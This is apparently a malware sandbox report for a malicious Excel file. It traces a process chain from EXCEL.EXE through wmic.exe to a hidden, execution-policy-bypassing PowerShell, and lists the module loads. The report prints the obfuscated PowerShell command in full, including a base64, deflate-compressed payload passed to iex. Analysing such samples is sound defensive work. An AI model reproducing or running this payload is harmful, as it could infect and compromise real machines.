1NfKrNcPouzrHpL9jpmMac9US/I1+hTukO4olKPqE53m57EeyWf5FMdFgeqFZClETypfW2+x6xHsW7OIRU/5zfycSw9hzYKdwlreTbSCaccCE/Lz3oWPMHJWSraC3ROfFs+zHjljDYfaV1uIFK9zUKbWSCf1IgssNMS7SXo3V9b6uokay0SbsiTqodF+MPP7IqqLzdkMB/Dh3H5CO29IaDH1GHlLdqkGKJfkBXJyHyuGt694apf1H0hv2094Vqe7OxVZt8+Vyy/Hc+bLvqqHuLmM9ztDF57VY8ed7EofQwHU/P7nc95vx4msahcVNwun4cf+v4odFY2sbORFOH/MbdpzXXlcp4dvZ7gTjTzQ6N0pDDSzK21AYoXQTX5mHA8n+1H1JkC8ddKQVTZ3N6k6ZslOUiZ4j7p8nHUOUg18iwrPUYxGsFtJ5ftFy3Mo/UT7nY74MlHl9HPDTSrYRqHmM/uX3LDyhJCqD3kX3Gr1b7+73/88Nff//Z3f/jbX/7tj7//92/lf8qXP/3uD7/98af7vx/+8t9//uu3n7777p9/+Pn7b21/+fI3//p33375p28//vyXf/jytXy9/r58/fr1/8r969f/Bw==' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieX"
Path
C:\WINDOWS\System32\Wbem\wMIc.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\sechost.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\shcore.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\imm32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msiso.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\dwmapi.dll
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\msoxmlmf.dll
c:\windows\system32\vcruntime140.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll

PID
2864
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
Parent process
wMIc.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msctf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\dwmapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll

PID
556
CMD
POWeRsHEll -NOprOf -WiN 00000000000000000000001 -EP byPass -nONiNtErac $K03 = [STRing][CHAr]34 ;$7HE =([CHAr]44).TOSTRinG() ;"\".(${K03}{0}{1}${K03} -f's'${7HE}'al') ('Re') (${K03}{0}{2}{1}${K03}-f'N'${7HE}'-Object'${7HE}'ew');.(${K03}{0}{1}${K03}-f 's'${7HE}'al') ('Er') (${K03}{1}{0}${K03}-f 'x'${7HE}'iE');Er(Re io.COMpResSion.DEFLATEsTREAM([sYSTEm.io.mEmORyStrEAM] [COnVeRt]::frOmBaSe64StrIng( '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' ) ${7HE} [iO.COmpREsSiON.compRESSiOnMode]::decOmprEsS)|% {Re io.STreAMrEADeR( `$_ ${7HE} [texT.ENcodInG]::utf8 ) } ).rEADtoeNd( )"\" |ieX
Path
C:\WINDOWS\System32\WindowsPowerShell\v1.0\POWeRsHEll.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\atl.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.core\b1a706fe92b04f53967ea451c0424720\system.core.ni.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml\6d13a04975e2790306322d5633b19e14\system.xml.ni.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\amsi.dll
c:\windows\system32\userenv.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.dired13b18a9#\7d004557bd89e0e17610f833bf4e5d8e\system.directoryservices.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.management\87bb463de6b86b3f812bfbe330f33afb\system.management.ni.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.data\16770c16db8c1f805452f2841c8def08\system.data.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\gpapi.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.configuration\7a6a0638a30c6a9662ea0def5eb7d4e1\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.transactions\06fbc9e1d48aaf633f2e2e85252d4ff5\system.transactions.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wldp.dll
c:\windows\system32\cryptnet.dll
c:\windows\system32\msisip.dll
c:\windows\system32\coml2.dll
c:\windows\system32\wshext.dll
c:\windows\system32\appxsip.dll
c:\windows\system32\opcservices.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\windowspowershell\v1.0\pwrshsip.dll
c:\windows\system32\uxtheme.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.confe64a9051#\b7ac1697a6561524047b7bd66362f3a8\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\windowsbase\8604bd365c35cb553eff5fc8fd67fd19\windowsbase.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\presentationcore\62b9468240b1680a41ae0b06684c40d5\presentationcore.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\presentatio5ae0f00f#\3eca476a270a2cb119f487c890810379\presentationframework.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xaml\753248c2082aaa25ba3f3b64f8f24362\system.xaml.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.xml.linq\b59428c2a855f7044b339e8206043346\system.xml.linq.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\3f36acc2c301bad2fdfaedc0673d0272\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\6eb5b70b44953ab1c32186be8b418177\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\1456184b8237e803b725e0fc8cc5bbff\system.windows.forms.ni.dll
c:\windows\microsoft.net\assembly\gac_64\microsoft.visualbasic.activities.compiler\v4.0_10.0.0.0__b03f5f7f11d50a3a\microsoft.visualbasic.activities.compiler.dll
c:\windows\system32\msvcp120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\microsoft.v9921e851#\94a3f05ae4dab0ff71443505d0ee300b\microsoft.visualbasic.ni.dll
c:\windows\microsoft.net\assembly\gac_64\system.enterpriseservices\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.enterpriseservices.dll
c:\windows\microsoft.net\assembly\gac_64\system.enterpriseservices\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.enterpriseservices.wrapper.dll
c:\windows\system32\ntmarta.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.runteb92aa12#\509b15a107dedcf707e7cd6e17e061cd\system.runtime.serialization.ni.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrcompression.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\schannel.dll
c:\windows\system32\mskeyprotect.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\ntasn1.dll
c:\windows\system32\ncryptsslp.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll

PID
452
CMD
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path
C:\WINDOWS\system32\conhost.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Console Window Host
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\conhost.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\conhostv2.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\shcore.dll
c:\windows\system32\windows.storage.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\msctf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\dwmapi.dll
c:\windows\winsxs\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.431_none_15c7d3ee93659e73\comctl32.dll
c:\windows\system32\clbcatq.dll

PID
1084
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
POWeRsHEll.exe
User
admin
Integrity Level
MEDIUM
Exit code
4000
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.16299.15 (WinBuild.160101.0800)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\win32u.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\imm32.dll
c:\windows\microsoft.net\framework64\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clr.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\mscorlib\ccb48f84a5cca36e9b0205b6a65ee54a\mscorlib.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework64\v4.0.30319\clrjit.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system\0f4ce136d3903860dec4b2ed8baeddea\system.ni.dll
